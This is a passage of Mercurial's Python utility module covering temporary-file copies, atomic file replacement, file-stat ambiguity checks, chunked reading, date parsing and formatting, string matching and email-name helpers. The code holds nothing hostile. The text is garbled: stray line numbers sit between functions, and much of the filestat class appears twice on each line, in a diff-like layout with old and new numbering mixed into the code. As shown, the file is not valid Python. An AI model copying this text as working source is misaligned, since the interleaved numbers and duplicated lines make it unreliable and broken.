    It is recommended to use os.path.normpath() before using this
    function if need.'''
    return path.split(pycompat.ossep)
1601
1605
def gui():
    '''Are we running in a GUI?'''
    if pycompat.isdarwin:
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        # elsewhere: Windows always has a GUI; X11 needs $DISPLAY
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
1616
1620
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source vanished: the (empty) temp file stands in for it
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a half-written temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1657
1661
1658 class filestat(object):
1662 class filestat(object):
1659 """help to exactly detect change of a file
1663 """help to exactly detect change of a file
1660
1664
1661 'stat' attribute is result of 'os.stat()' if specified 'path'
1665 'stat' attribute is result of 'os.stat()' if specified 'path'
1662 exists. Otherwise, it is None. This can avoid preparative
1666 exists. Otherwise, it is None. This can avoid preparative
1663 'exists()' examination on client side of this class.
1667 'exists()' examination on client side of this class.
1664 """
1668 """
    def __init__(self, stat):
        # 'stat' is an os.stat() result, or None when the path is absent
        self.stat = stat
1667
1671
    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; a missing file yields stat=None."""
        try:
            stat = os.stat(path)
        except OSError as err:
            # only a missing file is expected; re-raise anything else
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)
1677
1681
    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an open file object (must have fileno())."""
        stat = os.fstat(fp.fileno())
        return cls(stat)
1682
1686
    # keep identity-based hashing even though __eq__ below is overridden
    __hash__ = object.__hash__
1684
1688
1685 def __eq__(self, old):
1689 def __eq__(self, old):
1686 try:
1690 try:
1687 # if ambiguity between stat of new and old file is
1691 # if ambiguity between stat of new and old file is
1688 # avoided, comparison of size, ctime and mtime is enough
1692 # avoided, comparison of size, ctime and mtime is enough
1689 # to exactly detect change of a file regardless of platform
1693 # to exactly detect change of a file regardless of platform
1690 return (self.stat.st_size == old.stat.st_size and
1694 return (self.stat.st_size == old.stat.st_size and
1691 self.stat.st_ctime == old.stat.st_ctime and
1695 self.stat.st_ctime == old.stat.st_ctime and
1692 self.stat.st_mtime == old.stat.st_mtime)
1696 self.stat.st_mtime == old.stat.st_mtime)
1693 except AttributeError:
1697 except AttributeError:
1694 pass
1698 pass
1695 try:
1699 try:
1696 return self.stat is None and old.stat is None
1700 return self.stat is None and old.stat is None
1697 except AttributeError:
1701 except AttributeError:
1698 return False
1702 return False
1699
1703
1700 def isambig(self, old):
1704 def isambig(self, old):
1701 """Examine whether new (= self) stat is ambiguous against old one
1705 """Examine whether new (= self) stat is ambiguous against old one
1702
1706
1703 "S[N]" below means stat of a file at N-th change:
1707 "S[N]" below means stat of a file at N-th change:
1704
1708
1705 - S[n-1].ctime < S[n].ctime: can detect change of a file
1709 - S[n-1].ctime < S[n].ctime: can detect change of a file
1706 - S[n-1].ctime == S[n].ctime
1710 - S[n-1].ctime == S[n].ctime
1707 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1711 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1708 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1712 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1709 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1713 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1710 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1714 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1711
1715
1712 Case (*2) above means that a file was changed twice or more at
1716 Case (*2) above means that a file was changed twice or more at
1713 same time in sec (= S[n-1].ctime), and comparison of timestamp
1717 same time in sec (= S[n-1].ctime), and comparison of timestamp
1714 is ambiguous.
1718 is ambiguous.
1715
1719
1716 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1720 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1717 timestamp is ambiguous".
1721 timestamp is ambiguous".
1718
1722
1719 But advancing mtime only in case (*2) doesn't work as
1723 But advancing mtime only in case (*2) doesn't work as
1720 expected, because naturally advanced S[n].mtime in case (*1)
1724 expected, because naturally advanced S[n].mtime in case (*1)
1721 might be equal to manually advanced S[n-1 or earlier].mtime.
1725 might be equal to manually advanced S[n-1 or earlier].mtime.
1722
1726
1723 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1727 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1724 treated as ambiguous regardless of mtime, to avoid overlooking
1728 treated as ambiguous regardless of mtime, to avoid overlooking
1725 by confliction between such mtime.
1729 by confliction between such mtime.
1726
1730
1727 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1731 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1728 S[n].mtime", even if size of a file isn't changed.
1732 S[n].mtime", even if size of a file isn't changed.
1729 """
1733 """
1730 try:
1734 try:
1731 return (self.stat.st_ctime == old.stat.st_ctime)
1735 return (self.stat.st_ctime == old.stat.st_ctime)
1732 except AttributeError:
1736 except AttributeError:
1733 return False
1737 return False
1734
1738
1735 def avoidambig(self, path, old):
1739 def avoidambig(self, path, old):
1736 """Change file stat of specified path to avoid ambiguity
1740 """Change file stat of specified path to avoid ambiguity
1737
1741
1738 'old' should be previous filestat of 'path'.
1742 'old' should be previous filestat of 'path'.
1739
1743
1740 This skips avoiding ambiguity, if a process doesn't have
1744 This skips avoiding ambiguity, if a process doesn't have
1741 appropriate privileges for 'path'. This returns False in this
1745 appropriate privileges for 'path'. This returns False in this
1742 case.
1746 case.
1743
1747
1744 Otherwise, this returns True, as "ambiguity is avoided".
1748 Otherwise, this returns True, as "ambiguity is avoided".
1745 """
1749 """
1746 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1750 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1747 try:
1751 try:
1748 os.utime(path, (advanced, advanced))
1752 os.utime(path, (advanced, advanced))
1749 except OSError as inst:
1753 except OSError as inst:
1750 if inst.errno == errno.EPERM:
1754 if inst.errno == errno.EPERM:
1751 # utime() on the file created by another user causes EPERM,
1755 # utime() on the file created by another user causes EPERM,
1752 # if a process doesn't have appropriate privileges
1756 # if a process doesn't have appropriate privileges
1753 return False
1757 return False
1754 raise
1758 raise
1755 return True
1759 return True
1756
1760
1757 def __ne__(self, other):
1761 def __ne__(self, other):
1758 return not self == other
1762 return not self == other
1759
1763
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        # all I/O goes to a temporary file beside the target; the target
        # itself is only touched by the rename in close()
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        # Commit: atomically replace the target with the temporary copy.
        # With checkambig, also ensure the new stat cannot be confused
        # with the pre-rename one (see filestat.isambig).
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        # Abort: delete the temporary file without touching the target.
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit; discard when an exception is propagating
        if exctype is not None:
            self.discard()
        else:
            self.close()
1822
1826
def unlinkpath(f, ignoremissing=False):
    """Unlink ``f`` and prune its parent directories if now empty."""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # deleting the file may have left empty ancestor directories behind
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1834
1838
def tryunlink(f):
    """Remove a file, silently tolerating a missing-file (ENOENT) error."""
    try:
        unlink(f)
    except OSError as err:
        # a file that is already gone is not a failure here
        if err.errno == errno.ENOENT:
            return
        raise
1842
1846
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # directory already exists: nothing to do
            return
        if err.errno != errno.ENOENT or not name:
            # unexpected failure (permissions, ...) or an empty name
            raise
        # a parent is missing: create the ancestry first, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without making progress
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    # mode is applied only to directories actually created by this call
    if mode is not None:
        os.chmod(name, mode)
1870
1874
def readfile(path):
    """Return the entire content of ``path``, read in binary mode."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
1874
1878
def writefile(path, text):
    """Replace the content of ``path`` with ``text``, in binary mode."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
1878
1882
def appendfile(path, text):
    """Append ``text`` to the end of ``path``, in binary mode."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
1882
1886
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # re-chunk anything larger than 1 MiB into 256 KiB pieces so
            # a single huge input chunk cannot dominate memory usage
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # offset into self._queue[0] of data already handed out by read()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        # NOTE(review): the l=None path joins only self.iter; data already
        # buffered in self._queue is not included — presumably callers use
        # one mode exclusively per instance; confirm before relying on mixing
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
1962
1966
def filechunkiter(f, size=131072, limit=None):
    """Yield successive reads from ``f`` in blocks of at most ``size`` bytes.

    Iteration stops at end of file, or once ``limit`` bytes (when
    given) have been produced.  A yielded block may be shorter than
    ``size`` for the final chunk, or when ``f`` is a socket or another
    file-like object that sometimes returns short reads.
    """
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        want = size if limit is None else min(limit, size)
        # ``want`` reaches 0 only when the limit is exhausted; the
        # short-circuit below then skips the read() call entirely
        chunk = want and f.read(want)
        if not chunk:
            break
        if limit:
            limit -= len(chunk)
        yield chunk
1983
1987
class cappedreader(object):
    """Proxy a file object, exposing at most N bytes of it.

    read() calls are forwarded to the wrapped file object but clamped
    so no more than the configured number of bytes can ever be
    consumed; once the allowance is used up the proxy behaves as if it
    reached EOF.

    The wrapped file object must not be read through any other path
    while the proxy is in use, or the internal accounting gets out of
    sync and results become unpredictable.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        if not remaining:
            # allowance exhausted: simulate end-of-file
            return b''
        size = remaining if n < 0 else min(n, remaining)
        data = self._fh.read(size)
        self._left = remaining - len(data)
        assert self._left >= 0
        return data
2012
2016
def makedate(timestamp=None):
    """Return ``(unixtime, offset)`` for ``timestamp`` (default: now).

    ``offset`` is the local timezone's displacement from UTC in
    seconds, computed for that particular moment so daylight-saving
    transitions are accounted for.  Raises Abort on a negative
    timestamp.
    """
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        # a pre-epoch clock is almost certainly misconfigured
        raise Abort(_("negative timestamp: %d") % timestamp,
                    hint=_("check your clock"))
    utc = datetime.datetime.utcfromtimestamp(timestamp)
    local = datetime.datetime.fromtimestamp(timestamp)
    delta = utc - local
    return timestamp, delta.days * 86400 + delta.seconds
2025
2029
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand the Mercurial-specific zone escapes: %1 is the signed
        # hour part, %2 the minute part, %z shorthand for %1%2.  The
        # replacement order matters: %z must be rewritten before %1/%2
        # are substituted with concrete digits.
        sign = (tz > 0) and "-" or "+"
        minutes = abs(tz) // 60
        q, r = divmod(minutes, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    d = t - tz
    # clamp to the signed 32-bit range accepted by the datetime
    # arithmetic below (see the doctest boundary cases)
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
    return s
2061
2065
def shortdate(date=None):
    """Render a (timestamp, tzoff) tuple as a bare ISO 8601 date."""
    # delegate to datestr with a date-only format: no time, no zone
    return datestr(date, format='%Y-%m-%d')
2065
2069
def parsetimezone(s):
    """Find a trailing timezone in ``s``, if any.

    Returns an ``(offset, remainder)`` pair: ``offset`` is the zone's
    displacement from UTC in seconds (None when no zone is recognized)
    and ``remainder`` is the string with the zone text stripped.
    """
    # explicit GMT/UTC suffix
    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = 1 if s[-5] == "+" else -1
        hours = int(s[-4:-2])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z (only when preceded by a digit, so that words
    # merely ending in Z are left alone)
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = 1 if s[-6] == "+" else -1
        hours = int(s[-5:-3])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    return None, s
2093
2097
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        found = [True for p in part if ("%"+p) in format]
        if not found:
            # the field is absent from the format: append a default value
            # (and the matching directive) so strptime can still succeed
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone: derive the offset from the difference between
        # local mktime() and UTC timegm() of the same broken-down time
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
2126
2130
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(
    ...     datetime.date.today().strftime('%b %d').encode('ascii'))
    True
    >>> parsedate(b'yesterday ') == parsedate(
    ...     (datetime.date.today() - datetime.timedelta(days=1)
    ...     ).strftime('%b %d').encode('ascii'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        # already in parsed form: pass it through unchanged
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    # symbolic dates (also matched in the current locale's translation)
    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime(r'%b %d')
        date = encoding.strtolocal(date)
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime(r'%b %d')
        date = encoding.strtolocal(date)

    try:
        # fast path: internal "unixtime offset" representation
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # try each configured format until one parses
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2205
2209
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # Round unspecified fields down (month/day = 1) so a partial date
        # maps to the earliest timestamp it can denote.
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # Round unspecified fields up (Dec, 23:59:59); try month lengths
        # from 31 down because parsedate raises ParseError for impossible
        # days like Feb 31, and fall back to 28 as the universal maximum.
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except error.ParseError:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        # on or before the given date (inclusive upper bound)
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        # on or after the given date (inclusive lower bound)
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # "-N": within the last N days from now
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # explicit inclusive range "DATE to DATE"
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        # a single (possibly partial) date matches the whole span it covers
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2281
2285
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0
            if not casesensitive:
                flags = remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        # regex.search matches anywhere in the candidate string
        return 're', pattern, regex.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    # fall-through: anything without a recognized prefix is a literal match
    match = pattern.__eq__

    if not casesensitive:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2340
2344
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # Drop the mail domain, if any.
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    # Keep only what follows a '<' (the addr-spec in "Name <addr>").
    bracket = user.find('<')
    if bracket >= 0:
        user = user[bracket + 1:]
    # Truncate at the first space, then at the first dot.
    for sep in (' ', '.'):
        pos = user.find(sep)
        if pos >= 0:
            user = user[:pos]
    return user
2356
2360
def emailuser(user):
    """Return the user portion of an email address."""
    # Strip the domain first, then anything up to and including '<'
    # so "Name <local@domain>" reduces to "local".
    at = user.find('@')
    if at != -1:
        user = user[:at]
    bracket = user.find('<')
    if bracket != -1:
        user = user[bracket + 1:]
    return user
2366
2370
def email(author):
    '''get email of author.'''
    # Take the text between '<' and '>'. With no '>' the slice runs to
    # the end; with no '<', find() returns -1 and the slice starts at 0.
    start = author.find('<') + 1
    end = author.find('>')
    if end == -1:
        end = None
    return author[start:end]
2373
2377
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # encoding.trim measures display columns and appends '...' when it
    # actually truncates (ellipsis keyword).
    return encoding.trim(text, maxlength, ellipsis='...')
2377
2381
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def render(count):
        # Use the first unit whose threshold the magnitude reaches.
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # Nothing reached its threshold: fall back to the smallest unit.
        return unittable[-1][2] % count

    return render
2388
2392
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    # Validate ordering first, then the 1-based lower bound.
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # Shift only the start: (fromline-1, toline) is a half-open 0-based range.
    return (fromline - 1, toline)
2409
2413
# Render a byte count with the largest fitting binary unit, keeping
# roughly three significant digits (e.g. 1.23 MB, 12.3 KB, 123 bytes).
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2422
2426
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
# Note: bytes pattern — the tolf/tocrlf helpers below operate on bytes.
_eolre = remod.compile(br'\r*\n')
2427
2431
def tolf(s):
    """Normalize every EOL in s (CRLF, including repeated CRs) to LF."""
    return _eolre.sub('\n', s)
2430
2434
def tocrlf(s):
    """Normalize every EOL in s to CRLF."""
    return _eolre.sub('\r\n', s)
2433
2437
# Select EOL converters for the host convention: on Windows
# (os.linesep == '\r\n') native text uses CRLF; elsewhere the internal
# LF form is already native, so the identity function is used.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2440
2444
def escapestr(s):
    """Backslash-escape a byte string (like s.encode('string_escape')).

    codecs.escape_encode is the C routine backing the Python 2
    'string_escape' codec; calling it directly also works on Python 3,
    where the codec is no longer reachable via str.encode.
    """
    encoded, _consumed = codecs.escape_encode(s)
    return encoded
2445
2449
def unescapestr(s):
    """Decode backslash escapes in a byte string (inverse of escapestr)."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2448
2452
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        # direct conversion works for objects whose str form is ASCII-safe
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2457
2461
def uirepr(s):
    """Return a byte-string repr of s suitable for user display."""
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2461
2465
# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

